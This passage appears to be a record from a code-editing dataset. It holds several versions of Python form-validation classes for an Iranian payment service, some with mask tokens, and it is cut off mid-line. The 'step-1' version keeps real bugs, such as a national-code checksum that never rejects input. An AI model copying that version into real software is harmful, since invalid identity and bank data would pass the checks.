                MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),
                enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))

    def _check_with_maxDataLengthValidator(self, data):
        """Fail when the value is missing or longer than ``length``.

        NOTE(review): reuses the 'insufficient length' message for the
        over-length case — confirm the wording is intended.
        """
        if data['value'] is None or len(data['value']) > data['length']:
            self.setError(data['field'], (enum.Error.
                MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),
                enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))

    def _check_with_equalDataLengthValidator(self, data):
        """Fail unless the value's length is exactly ``length``."""
        if data['value'] is None or len(data['value']) != data['length']:
            self.setError(data['field'], (enum.Error.
                MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),
                enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))

    def _check_with_inputValidator(self, data):
        """Fail when the value is missing or empty."""
        if data['value'] is None or len(data['value']) < 1:
            self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)

    def _check_with_IbanTransferable(self, data):
        """Reject IBANs that cannot receive transfers.

        NOTE(review): '062' / '080' look like bank/branch codes — confirm
        which institutions they identify before changing this rule.
        """
        if data['value'][4:7] == '062' and data['value'][-13:-10] == '080':
            self.setError(data['field'], enum.Error.NOT_IBAN_TRANSFERABLE.value
                )

    def _check_with_username(self, data):
        """Usernames may contain only letters, digits, '_', '.' and '-'."""
        if re.match('^[a-zA-Z0-9_.-]+$', data['value']) is None:
            self.setError(data['field'], enum.Error.INVALID_USERNAME.value)

    # --- registration helpers: each queues one validator, returns self ---

    def checkType(self, field, type, value='unAssigned'):
        self.addValidation({'field': field, 'type': type, 'value': value},
            self._check_with_typeValidator)
        return self

    def checkNationalLegalCode(self, field, code='unAssigned'):
        self.addValidation({'field': field, 'value': code}, self.
            _check_with_nationalLegalCodeValidator)
        return self

    def checkOfficer1NationalCode(self, field, code='unAssigned'):
        self.addValidation({'field': field, 'value': code}, self.
            _check_with_officer1NationalCodeValidator)
        return self

    def checkOfficer2NationalCode(self, field, code='unAssigned'):
        self.addValidation({'field': field, 'value': code}, self.
            _check_with_officer2NationalCodeValidator)
        return self

    def checkNationalCode(self, field, code='unAssigned'):
        self.addValidation({'field': field, 'value': code}, self.
            _check_with_nationalCodeValidator)
        return self

    def checkFeatures(self, field, features='unAssigned'):
        self.addValidation({'field': field, 'value': features}, self.
            _check_with_featuresValidator)
        return self

    def checkUserName(self, field, username='unAssigned'):
        self.addValidation({'field': field, 'value': username}, self.
            _check_with_userNameValidator)
        return self

    def checkPhone(self, field, data='unAssigned'):
        self.addValidation({'field': field, 'value': data}, self.
            _check_with_phoneNumberValidator)
        return self

    def checkMobile(self, field, data='unAssigned'):
        self.addValidation({'field': field, 'value': data}, self.
            _check_with_mobileValidator)
        return self

    def checkEmail(self, field, data='unAssigned'):
        self.addValidation({'field': field, 'value': data}, self.
            _check_with_emailValidator)
        return self

    def checkNotNone(self, field, data='unAssigned'):
        self.addValidation({'field': field, 'value': data}, self.
            _check_with_noneValidator)
        return self

    def checkFile(self, field, data, **options):
        self.addValidation({'field': field, 'value': data, 'options':
            options}, self._check_with_fileValidator)
        return self

    def checkIBAN(self, field, data='unAssigned'):
        self.addValidation({'field': field, 'value': data}, self.
            _check_with_IBANValidator)
        return self

    def checkBankAccountDestinationForSubmerchant(self, field, userId, subId):
        data = {'userId': userId, 'subId': subId}
        self.addValidation({'field': field, 'value': data}, self.
            _check_with_subMerchantBankAccountValidator)
        return self

    def checkDataLength(self, field, length, mode='equal', data='unAssigned'):
        """Queue a length check; ``mode`` is 'equal', 'min' or 'max'.

        Fix: ``mode='max'`` used to register the *min*-length validator, so
        over-length values were never caught; an unknown mode used to raise
        NameError and now falls back to the equality check.
        """
        if mode == 'min':
            validatorFunction = self._check_with_minDataLengthValidator
        elif mode == 'max':
            validatorFunction = self._check_with_maxDataLengthValidator
        else:
            validatorFunction = self._check_with_equalDataLengthValidator
        self.addValidation({'field': field, 'value': data, 'length': length
            }, validatorFunction)
        return self

    def checkInputData(self, field, data='unAssigned'):
        self.addValidation({'field': field, 'value': data}, self.
            _check_with_inputValidator)
        return self

    def checkTelephone(self, field, data='unAssigned'):
        # Alias of checkPhone: registers the same validator.
        self.addValidation({'field': field, 'value': data}, self.
            _check_with_phoneNumberValidator)
        return self

    def checkIsIbanTransferable(self, field, data='unAssigned'):
        self.addValidation({'field': field, 'value': data}, self.
            _check_with_IbanTransferable)
        return self

    def checkUsername(self, field, data='unAssigned'):
        """Queue the username-pattern validator; returns self.

        Fix: the validator used to be *called* at registration time
        (``self._check_with_username()`` — TypeError) and the method did
        not return ``self`` like every other ``check*`` helper.
        """
        self.addValidation({'field': field, 'value': data}, self.
            _check_with_username)
        return self
class DataValidator:
    """Facade that aggregates a FieldValidator and an ObjectValidator and
    merges their results into one error dict and one status code."""

    def __init__(self, data=None):
        # ``None`` default instead of a mutable ``{}`` default so
        # independent instances can never share one dict.
        self.fieldValidator = FieldValidator(data if data is not None else {})
        self.objectValidator = ObjectValidator()
        self.errors = {}
        self.statusCode = 200

    def getValidatorsErrors(self):
        """Run both validators, merge their per-field errors into
        ``self.errors``, derive ``self.statusCode`` and return the dict."""
        self.objectValidator.validate()
        self.fieldValidator.validate()
        for key, messages in self.fieldValidator.getErrors().items():
            self.errors[key] = self.errors.get(key, []) + messages
        self.statusCode = self.fieldValidator.statusCode
        for key, messages in self.objectValidator.getErrors().items():
            self.errors[key] = self.errors.get(key, []) + messages
        # Object-level failures take precedence over the field-level status.
        if self.objectValidator.statusCode != 200:
            self.statusCode = self.objectValidator.statusCode
        return self.errors

    def generateMessage(self):
        """Map well-known error keys to user-facing (Persian) messages."""
        messages = []
        errorKeys = self.errors.keys()
        if 'email' in errorKeys:
            messages.append(' آدرس ایمیل نامعتبر است')
        if 'name' in errorKeys:
            messages.append('نام را وارد کنید')
        if 'username' in errorKeys:
            messages.append('نام کاربری را وارد کنید')
        if 'password' in errorKeys:
            messages.append('رمز عبور را وارد کنید')
        if 'mobile' in errorKeys:
            messages.append('تلفن همراه خود را وارد کنید.')
        if 'phone' in errorKeys:
            messages.append(
                'تلفن ثابت را به فرمت 02122407556 و 11 رقمی وارد کنید')
        if 'iban' in errorKeys or 'IBAN' in errorKeys:
            messages.append(
                'شماره شبای وارد شده معتبر نیست. 26 کاراکتر و شروع با IR و بدون خط تیره (-) و فاصله'
                )
        if 'user' in errorKeys:
            messages.append('لطفا وارد شوید')
        return messages
<|reserved_special_token_1|>
import API.enum as enum
import re
class ObjectValidator():
    """Queues object-level validations (auth, uniqueness, existence).

    ``check*`` methods queue work; ``validate()`` executes the queue and
    records failures in ``errors`` / ``statusCode``.
    """

    def __init__(self, validationData=None, *args, **kwargs):
        # None sentinel avoids the shared-mutable-default pitfall.
        self.data = validationData if validationData is not None else {}
        self.statusCode = 200
        self.validationPipeline = []  # [{'data': descriptor, 'validator': bound method}]
        self.errors = {}              # {field: [error messages]}
        self.invalidFields = []

    def flush(self):
        """Reset this validator in place and return it.

        Bug fix: the original re-bound the *local* name ``self`` to a fresh
        instance, which left this object's state untouched.
        """
        self.data = {}
        self.statusCode = 200
        self.validationPipeline = []
        self.errors = {}
        self.invalidFields = []
        return self

    def setError(self, field, error):
        """Record *error* (a (message, status-code) pair) once per field."""
        if field not in self.invalidFields:
            fieldErrors = self.errors.get(field, [])
            if error[0] not in fieldErrors:
                self.errors[field] = fieldErrors + [error[0]]
                self.statusCode = error[1]
                self.invalidFields.append(field)

    def getErrors(self):
        """Return the accumulated {field: [messages]} mapping."""
        return self.errors

    def validate(self):
        """Run every queued validator; a validator that raises marks its
        field with a generic invalid-data error instead of propagating."""
        for validation in self.validationPipeline:
            try:
                validation['validator'](validation['data'])
            except Exception:  # narrowed from a bare except:
                self.setError(validation['data']['field'],
                              enum.Error.INVALID_FIELD_DATA.value)

    def addValidation(self, data, validatorFunction):
        """Queue *validatorFunction* to be run on *data* by validate()."""
        self.validationPipeline.append({
            'data': data,
            'validator': validatorFunction
        })

    def _check_with_authenticationValidator(self, data):
        # data['user'] is expected to expose .is_authenticated (e.g. Django user).
        if not data['user'].is_authenticated:
            self.setError(data['field'], enum.Error.UNAUTHORIZED.value)

    def _check_with_nonDuplicateObjectValidator(self, data):
        # Any existing row matching the filter makes the field a duplicate.
        model = data['model']
        if model.objects.filter(**data['filter']):
            self.setError(data['field'], enum.Error.DUPLICATE_FIELDS.value)

    def _check_with_ObjectExistenceValidator(self, data):
        # Inverse of the duplicate check: at least one row must match.
        model = data['model']
        if not model.objects.filter(**data['filter']):
            self.setError(data['field'], enum.Error.GENERIC_OBJECT_NOT_FOUND.value)

    def checkNonDuplicateObject(self, field, model, **filter):
        """Queue a uniqueness check; returns self for chaining."""
        self.addValidation({'field': field, 'model': model, 'filter': filter},
                           self._check_with_nonDuplicateObjectValidator)
        return self

    def checkObjectExistence(self, field, model, **filter):
        """Queue an existence check; returns self for chaining."""
        self.addValidation({'field': field, 'model': model, 'filter': filter},
                           self._check_with_ObjectExistenceValidator)
        return self

    def checkUserAuthentication(self, field, user):
        """Queue an is-authenticated check; returns self for chaining."""
        self.addValidation({'field': field, 'user': user},
                           self._check_with_authenticationValidator)
        return self
# TODO: Iranian postal-code validation is not implemented yet; candidate regex:
#   \b(?!(\d)\1{3})[13-9]{4}[1346-9][013-9]{5}\b
class FieldValidator():
    """Fluent per-field validator.

    ``check*`` methods queue validations (resolving values from
    ``self.data`` when no explicit value is given); ``validate()`` runs the
    queue and records failures in ``self.errors`` / ``self.statusCode``.
    """

    def __init__(self, validationData=None, *args, **kwargs):
        # None sentinel instead of a shared mutable default argument.
        self.data = validationData if validationData is not None else {}
        self.validationPipeline = []  # [{'data': descriptor, 'validator': bound method}]
        self.statusCode = 200
        self.errors = {}              # {field: [error messages]}
        self.invalidFields = []

    def flush(self):
        """Reset all state in place and return self.

        Bug fix: the original re-bound the *local* name ``self`` to a fresh
        instance (a no-op on this object) and returned None.
        """
        self.data = {}
        self.validationPipeline = []
        self.statusCode = 200
        self.errors = {}
        self.invalidFields = []
        return self

    def setError(self, field, error):
        """Record *error* (a (message, status-code) pair) once per field."""
        if field not in self.invalidFields:
            fieldErrors = self.errors.get(field, [])
            if error[0] not in fieldErrors:
                self.errors[field] = fieldErrors + [error[0]]
                self.statusCode = error[1]
                self.invalidFields.append(field)

    def getErrors(self):
        """Return the accumulated {field: [messages]} mapping."""
        return self.errors

    def validate(self):
        """Run every queued validator; returns self for chaining.

        A validator that raises marks its field with a generic
        invalid-data error instead of propagating.
        """
        for validation in self.validationPipeline:
            try:
                validation['validator'](validation['data'])
            except Exception:  # narrowed from a bare except:
                self.setError(validation['data']['field'],
                              enum.Error.INVALID_FIELD_DATA.value)
        return self

    def addValidation(self, data, validatorFunction):
        """Queue *validatorFunction*; an 'unAssigned' value is resolved from
        self.data (or None when the field is absent)."""
        if data['value'] == 'unAssigned' and data['field'] in self.data.keys():
            data['value'] = self.data[data['field']]
        elif data['value'] == 'unAssigned' and data['field'] not in self.data.keys():
            data['value'] = None
        self.validationPipeline.append({
            'data': data,
            'validator': validatorFunction
        })

    # ------------------------------------------------------------------ #
    # validators (run by validate(); each records errors via setError)   #
    # ------------------------------------------------------------------ #

    def _check_with_typeValidator(self, data):
        if not isinstance(data['value'], data['type']):
            self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)

    def _check_with_nationalLegalCodeValidator(self, data):
        # Iranian legal-entity national ID: 11 digits with a weighted checksum.
        # NOTE(review): weights and decimal term kept exactly as the original
        # — verify against the official algorithm.
        nationalLegalCode = data['value']
        result = 0
        validationList = [29, 27, 23, 19, 17, 29, 27, 23, 19, 17]
        if len(nationalLegalCode) != 11:
            self.setError(data['field'], enum.Error.INVALID_NATIONAL_LEGAL_CODE.value)
            return
        for i in range(10):
            result += (int(nationalLegalCode[-2]) + 2 + int(nationalLegalCode[i])) * validationList[i]
        if result % 11 == 10:
            reminder = 0
        else:
            reminder = result % 11
        if reminder != int(nationalLegalCode[-1]):
            self.setError(data['field'], enum.Error.INVALID_NATIONAL_LEGAL_CODE.value)

    def _is_valid_national_code(self, nCode):
        """True iff *nCode* is a checksum-valid 10-digit Iranian national code.

        Bug fix: the original validators computed the checksum but only ever
        executed ``valid = valid and True`` (there was no branch setting it
        False), so the checksum could never fail and any 10-digit string was
        accepted.
        """
        if len(nCode) != 10:
            return False
        r = sum(int(nCode[i]) * (10 - i) for i in range(9)) % 11
        if r < 2:
            return r == int(nCode[9])
        return r == 11 - int(nCode[9])

    def _check_with_nationalCodeValidator(self, data):
        if not self._is_valid_national_code(data['value']):
            self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)

    # The officer variants share the algorithm; they exist so each officer's
    # field gets its own error entry.
    def _check_with_officer1NationalCodeValidator(self, data):
        self._check_with_nationalCodeValidator(data)

    def _check_with_officer2NationalCodeValidator(self, data):
        self._check_with_nationalCodeValidator(data)

    def _check_with_featuresValidator(self, data):
        # Every requested feature must be one of the known product names.
        for i in data['value']:
            if i not in ["پلتفرم پرداخت در محل", "باشگاه مشتریان", "درگاه پرداخت اینترنتی"]:
                self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)
                break

    def _check_with_userNameValidator(self, data):
        # Display-name style username: letter run, then space/_/- separated runs.
        username = re.match(r"^[A-Za-z]+(?:[ _-][A-Za-z0-9]+)*$", data["value"])
        if 'admin' in data['value'] or 'zibal' in data['value'] or username is None:
            self.setError(data['field'], enum.Error.INVALID_USERNAME.value)

    def _check_with_phoneNumberValidator(self, data):
        # Bug fix: the original tested len(data) — the descriptor dict, which
        # is never empty — instead of the value itself.
        if data['value'] is None or len(data['value']) < 1:
            self.setError(data['field'], enum.Error.PHONE_INCORRECT_TEMPLATE.value)

    def _check_with_mobileValidator(self, data):
        mobileNumber = data['value']
        if mobileNumber is None:
            self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)
            return
        if re.match(r"(^09[0-9]{9}$)", mobileNumber) is None:
            self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)

    def _check_with_emailValidator(self, data):
        email = data['value']
        if email is None:
            self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)
            return
        if re.match(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)", email) is None:
            self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)

    def _check_with_noneValidator(self, data):
        if data['value'] is None or data['value'] == "":
            self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)

    def _check_with_fileValidator(self, data):
        file = data['value']
        field = data['field']
        if file is None:
            self.setError(field, enum.Error.EMPTY_INPUT_FIELD.value)
            return
        elif file.size > enum.Limits.FILE_SIZE_LIMIT.value:
            self.setError(field, enum.Error.FILE_SIZE_EXCEED.value)
        # When 'types' is supplied, the content type must contain one of them.
        types = data['options'].get('types', None)
        valid = False
        if types is not None:
            for type in types:
                valid = valid or type in file.content_type
            if valid is False:
                self.setError(field, enum.Error.REQUEST_TYPE_ERROR.value)

    def _check_with_IBANValidator(self, data):
        # Iranian IBAN: 'IR' + 24 digits, validated with the mod-97 scheme.
        iban = data['value']
        if len(iban) != 26 or not iban.startswith("IR"):
            self.setError(data['field'], enum.Error.IBAN_ERROR.value)
            return
        code = iban[4:] + iban[:4]
        code = code.replace('I', '18').replace('R', '27')
        if int(code) % 97 != 1:
            self.setError(data['field'], enum.Error.IBAN_ERROR.value)

    def _check_with_subMerchantBankAccountValidator(self, data):
        # NOTE(review): SubMerchant is assumed to be imported elsewhere in
        # this module — verify before relying on this validator.
        if not SubMerchant.objects.filter(idsql=data['value']['userId'], ID=data['value']['subId'], status=1).exists():
            self.setError(data['field'], enum.Error.IMPOSSIBLE_BANK_ACCOUNT_DESTINATION.value)

    def _check_with_minDataLengthValidator(self, data):
        if data['value'] is None or len(data['value']) < data['length']:
            self.setError(data['field'], (enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),
                                          enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))

    def _check_with_maxDataLengthValidator(self, data):
        if data['value'] is None or len(data['value']) > data['length']:
            self.setError(data['field'], (enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),
                                          enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))

    def _check_with_equalDataLengthValidator(self, data):
        if data['value'] is None or len(data['value']) != data['length']:
            self.setError(data['field'], (enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),
                                          enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))

    def _check_with_inputValidator(self, data):
        if data['value'] is None or len(data['value']) < 1:
            self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)

    def _check_with_IbanTransferable(self, data):
        # NOTE(review): flags a specific bank/branch prefix combination as
        # non-transferable — confirm the business rule behind '062'/'080'.
        if data['value'][4:7] == '062' and data['value'][-13:-10] == '080':
            self.setError(data['field'], enum.Error.NOT_IBAN_TRANSFERABLE.value)

    def _check_with_username(self, data):
        # Strict account username: letters, digits, '_', '.', '-' only.
        if re.match(r"^[a-zA-Z0-9_.-]+$", data["value"]) is None:
            self.setError(data['field'], enum.Error.INVALID_USERNAME.value)

    # ------------------------------------------------------------------ #
    # fluent queueing API (each returns self for chaining)               #
    # ------------------------------------------------------------------ #

    def checkType(self, field, type, value="unAssigned"):
        self.addValidation({'field': field, 'type': type, 'value': value}, self._check_with_typeValidator)
        return self

    def checkNationalLegalCode(self, field, code="unAssigned"):
        self.addValidation({'field': field, 'value': code}, self._check_with_nationalLegalCodeValidator)
        return self

    def checkOfficer1NationalCode(self, field, code="unAssigned"):
        self.addValidation({'field': field, 'value': code}, self._check_with_officer1NationalCodeValidator)
        return self

    def checkOfficer2NationalCode(self, field, code="unAssigned"):
        self.addValidation({'field': field, 'value': code}, self._check_with_officer2NationalCodeValidator)
        return self

    def checkNationalCode(self, field, code="unAssigned"):
        self.addValidation({'field': field, 'value': code}, self._check_with_nationalCodeValidator)
        return self

    def checkFeatures(self, field, features="unAssigned"):
        self.addValidation({'field': field, 'value': features}, self._check_with_featuresValidator)
        return self

    def checkUserName(self, field, username="unAssigned"):
        self.addValidation({'field': field, 'value': username}, self._check_with_userNameValidator)
        return self

    def checkPhone(self, field, data="unAssigned"):
        self.addValidation({'field': field, 'value': data}, self._check_with_phoneNumberValidator)
        return self

    def checkMobile(self, field, data="unAssigned"):
        self.addValidation({'field': field, 'value': data}, self._check_with_mobileValidator)
        return self

    def checkEmail(self, field, data="unAssigned"):
        self.addValidation({'field': field, 'value': data}, self._check_with_emailValidator)
        return self

    def checkNotNone(self, field, data="unAssigned"):
        self.addValidation({'field': field, 'value': data}, self._check_with_noneValidator)
        return self

    def checkFile(self, field, data, **options):
        self.addValidation({'field': field, 'value': data, 'options': options}, self._check_with_fileValidator)
        return self

    def checkIBAN(self, field, data="unAssigned"):
        self.addValidation({'field': field, 'value': data}, self._check_with_IBANValidator)
        return self

    def checkBankAccountDestinationForSubmerchant(self, field, userId, subId):
        data = {
            'userId': userId,
            'subId': subId
        }
        self.addValidation({'field': field, 'value': data}, self._check_with_subMerchantBankAccountValidator)
        return self

    def checkDataLength(self, field, length, mode='equal', data="unAssigned"):
        """Queue a length check; *mode* is 'equal', 'min' or 'max'."""
        validators = {
            'equal': self._check_with_equalDataLengthValidator,
            'min': self._check_with_minDataLengthValidator,
            # Bug fix: mode='max' previously reused the *min* validator.
            'max': self._check_with_maxDataLengthValidator,
        }
        if mode not in validators:
            # Bug fix: an unknown mode previously raised UnboundLocalError.
            raise ValueError("mode must be 'equal', 'min' or 'max'")
        self.addValidation({'field': field, 'value': data, 'length': length}, validators[mode])
        return self

    def checkInputData(self, field, data="unAssigned"):
        self.addValidation({'field': field, 'value': data}, self._check_with_inputValidator)
        return self

    def checkTelephone(self, field, data="unAssigned"):
        # TODO: landline numbers currently share the generic phone validator.
        self.addValidation({'field': field, 'value': data}, self._check_with_phoneNumberValidator)
        return self

    def checkIsIbanTransferable(self, field, data="unAssigned"):
        self.addValidation({'field': field, 'value': data}, self._check_with_IbanTransferable)
        return self

    def checkUsername(self, field, data="unAssigned"):
        # Bug fix: the original invoked the validator with no arguments
        # (TypeError) instead of queueing it, and did not return self.
        self.addValidation({'field': field, 'value': data}, self._check_with_username)
        return self
class DataValidator:
    """Facade that runs a FieldValidator and an ObjectValidator together."""

    def __init__(self, data={}):
        self.fieldValidator = FieldValidator(data)
        self.objectValidator = ObjectValidator()
        self.errors = {}
        self.statusCode = 200

    def getValidatorsErrors(self):
        """Run both validators, merge their errors into self.errors and
        update self.statusCode; returns the merged mapping."""
        self.objectValidator.validate()
        self.fieldValidator.validate()
        for key, messages in self.fieldValidator.getErrors().items():
            self.errors[key] = self.errors.get(key, []) + messages
            self.statusCode = self.fieldValidator.statusCode
        for key, messages in self.objectValidator.getErrors().items():
            self.errors[key] = self.errors.get(key, []) + messages
            if self.objectValidator.statusCode != 200:
                self.statusCode = self.objectValidator.statusCode
        return self.errors

    def generateMessage(self):
        """Translate recorded error keys into user-facing (Persian) messages."""
        translations = (
            (('email',), ' آدرس ایمیل نامعتبر است'),
            (('name',), 'نام را وارد کنید'),
            (('username',), 'نام کاربری را وارد کنید'),
            (('password',), 'رمز عبور را وارد کنید'),
            (('mobile',), 'تلفن همراه خود را وارد کنید.'),
            (('phone',), 'تلفن ثابت را به فرمت 02122407556 و 11 رقمی وارد کنید'),
            (('iban', 'IBAN'), 'شماره شبای وارد شده معتبر نیست. 26 کاراکتر و شروع با IR و بدون خط تیره (-) و فاصله'),
            (('user',), 'لطفا وارد شوید'),
        )
        errorKeys = self.errors.keys()
        return [msg for keys, msg in translations
                if any(k in errorKeys for k in keys)]
|
flexible
|
{
"blob_id": "e8daf03f987c7512ff245bfbe16c447acd6b5986",
"index": 7574,
"step-1": "<mask token>\n\n\nclass FieldValidator:\n\n def __init__(self, validationData={}, *args, **kwargs):\n self.data = validationData\n self.validationPipeline = []\n self.statusCode = 200\n self.errors = {}\n self.invalidFields = []\n\n def flush(self):\n self = FieldValidator()\n\n def setError(self, field, error):\n if field not in self.invalidFields:\n fieldErrors = self.errors.get(field, [])\n if error[0] not in fieldErrors:\n self.errors[field] = fieldErrors + [error[0]]\n self.statusCode = error[1]\n self.invalidFields.append(field)\n\n def getErrors(self):\n return self.errors\n\n def validate(self):\n for validation in self.validationPipeline:\n try:\n validation['validator'](validation['data'])\n except:\n self.setError(validation['data']['field'], enum.Error.\n INVALID_FIELD_DATA.value)\n return self\n\n def addValidation(self, data, validatorFunction):\n if data['value'] == 'unAssigned' and data['field'] in self.data.keys():\n data['value'] = self.data[data['field']]\n elif data['value'] == 'unAssigned' and data['field'\n ] not in self.data.keys():\n data['value'] = None\n self.validationPipeline.append({'data': data, 'validator':\n validatorFunction})\n\n def _check_with_typeValidator(self, data):\n if not isinstance(data['value'], data['type']):\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_nationalLegalCodeValidator(self, data):\n nationalLegalCode = data['value']\n result = 0\n validationList = [29, 27, 23, 19, 17, 29, 27, 23, 19, 17]\n if len(nationalLegalCode) != 11:\n self.setError(data['field'], enum.Error.\n INVALID_NATIONAL_LEGAL_CODE.value)\n return\n for i in range(10):\n result += (int(nationalLegalCode[-2]) + 2 + int(\n nationalLegalCode[i])) * validationList[i]\n if result % 11 == 10:\n reminder = 0\n else:\n reminder = result % 11\n if reminder == int(nationalLegalCode[-1]):\n valid = True\n else:\n valid = False\n if valid is False:\n self.setError(data['field'], enum.Error.\n 
INVALID_NATIONAL_LEGAL_CODE.value)\n <mask token>\n\n def _check_with_officer1NationalCodeValidator(self, data):\n nCode = data['value']\n valid = True\n if len(nCode) != 10:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n return\n sum = 0\n for i in range(9):\n sum += int(nCode[i]) * (10 - i)\n r = sum % 11\n if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):\n valid = valid and True\n if valid is False:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_officer2NationalCodeValidator(self, data):\n nCode = data['value']\n valid = True\n if len(nCode) != 10:\n valid = False\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n return\n sum = 0\n for i in range(9):\n sum += int(nCode[i]) * (10 - i)\n r = sum % 11\n if r < 2 and r == int(nCode[9]) or r >= 2 and r == 11 - int(nCode[9]):\n valid = valid and True\n if valid is False:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.value)\n\n def _check_with_featuresValidator(self, data):\n for i in data['value']:\n if i not in ['پلتفرم پرداخت در محل', 'باشگاه مشتریان',\n 'درگاه پرداخت اینترنتی']:\n self.setError(data['field'], enum.Error.INVALID_FIELD_DATA.\n value)\n break\n\n def _check_with_userNameValidator(self, data):\n username = re.match('^[A-Za-z]+(?:[ _-][A-Za-z0-9]+)*$', data['value'])\n if 'admin' in data['value'] or 'zibal' in data['value'\n ] or username is None:\n self.setError(data['field'], enum.Error.INVALID_USERNAME.value)\n\n def _check_with_phoneNumberValidator(self, data):\n if data['value'] is None or len(data) < 1:\n self.setError(data['field'], enum.Error.\n PHONE_INCORRECT_TEMPLATE.value)\n <mask token>\n <mask token>\n <mask token>\n\n def _check_with_fileValidator(self, data):\n file = data['value']\n field = data['field']\n if file is None:\n self.setError(field, enum.Error.EMPTY_INPUT_FIELD.value)\n return\n elif file.size > enum.Limits.FILE_SIZE_LIMIT.value:\n self.setError(field, 
enum.Error.FILE_SIZE_EXCEED.value)\n types = data['options'].get('types', None)\n valid = False\n if types is not None:\n for type in types:\n valid = valid or type in file.content_type\n if valid is False:\n self.setError(field, enum.Error.REQUEST_TYPE_ERROR.value)\n <mask token>\n\n def _check_with_subMerchantBankAccountValidator(self, data):\n if not SubMerchant.objects.filter(idsql=data['value']['userId'], ID\n =data['value']['subId'], status=1).exists():\n self.setError(data['field'], enum.Error.\n IMPOSSIBLE_BANK_ACCOUNT_DESTINATION.value)\n\n def _check_with_minDataLengthValidator(self, data):\n if data['value'] is None or len(data['value']) < data['length']:\n self.setError(data['field'], (enum.Error.\n MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),\n enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))\n\n def _check_with_maxDataLengthValidator(self, data):\n if data['value'] is None or len(data['value']) > data['length']:\n self.setError(data['field'], (enum.Error.\n MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),\n enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))\n\n def _check_with_equalDataLengthValidator(self, data):\n if data['value'] is None or len(data['value']) != data['length']:\n self.setError(data['field'], (enum.Error.\n MESSAGE_INSUFFICIENT_LENGTH.value[0].format(data['length']),\n enum.Error.MESSAGE_INSUFFICIENT_LENGTH.value[1]))\n\n def _check_with_inputValidator(self, data):\n if data['value'] is None or len(data['value']) < 1:\n self.setError(data['field'], enum.Error.EMPTY_INPUT_FIELD.value)\n\n def _check_with_IbanTransferable(self, data):\n if data['value'][4:7] == '062' and data['value'][-13:-10] == '080':\n self.setError(data['field'], enum.Error.NOT_IBAN_TRANSFERABLE.value\n )\n\n def _check_with_username(self, data):\n username = re.match('^[a-zA-Z0-9_.-]+$', data['value'])\n if username is None:\n self.setError(data['field'], enum.Error.INVALID_USERNAME.value)\n\n def checkType(self, field, type, 
value='unAssigned'):\n self.addValidation({'field': field, 'type': type, 'value': value},\n self._check_with_typeValidator)\n return self\n\n def checkNationalLegalCode(self, field, code='unAssigned'):\n self.addValidation({'field': field, 'value': code}, self.\n _check_with_nationalLegalCodeValidator)\n return self\n\n def checkOfficer1NationalCode(self, field, code='unAssigned'):\n self.addValidation({'field': field, 'value': code}, self.\n _check_with_officer1NationalCodeValidator)\n return self\n\n def checkOfficer2NationalCode(self, field, code='unAssigned'):\n self.addValidation({'field': field, 'value': code}, self.\n _check_with_officer2NationalCodeValidator)\n return self\n\n def checkNationalCode(self, field, code='unAssigned'):\n self.addValidation({'field': field, 'value': code}, self.\n _check_with_nationalCodeValidator)\n return self\n\n def checkFeatures(self, field, features='unAssigned'):\n self.addValidation({'field': field, 'value': features}, self.\n _check_with_featuresValidator)\n return self\n <mask token>\n <mask token>\n <mask token>\n\n def checkEmail(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_emailValidator)\n return self\n\n def checkNotNone(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_noneValidator)\n return self\n\n def checkFile(self, field, data, **options):\n self.addValidation({'field': field, 'value': data, 'options':\n options}, self._check_with_fileValidator)\n return self\n\n def checkIBAN(self, field, data='unAssigned'):\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_IBANValidator)\n return self\n\n def checkBankAccountDestinationForSubmerchant(self, field, userId, subId):\n data = {'userId': userId, 'subId': subId}\n self.addValidation({'field': field, 'value': data}, self.\n _check_with_subMerchantBankAccountValidator)\n return self\n\n def checkDataLength(self, field, 
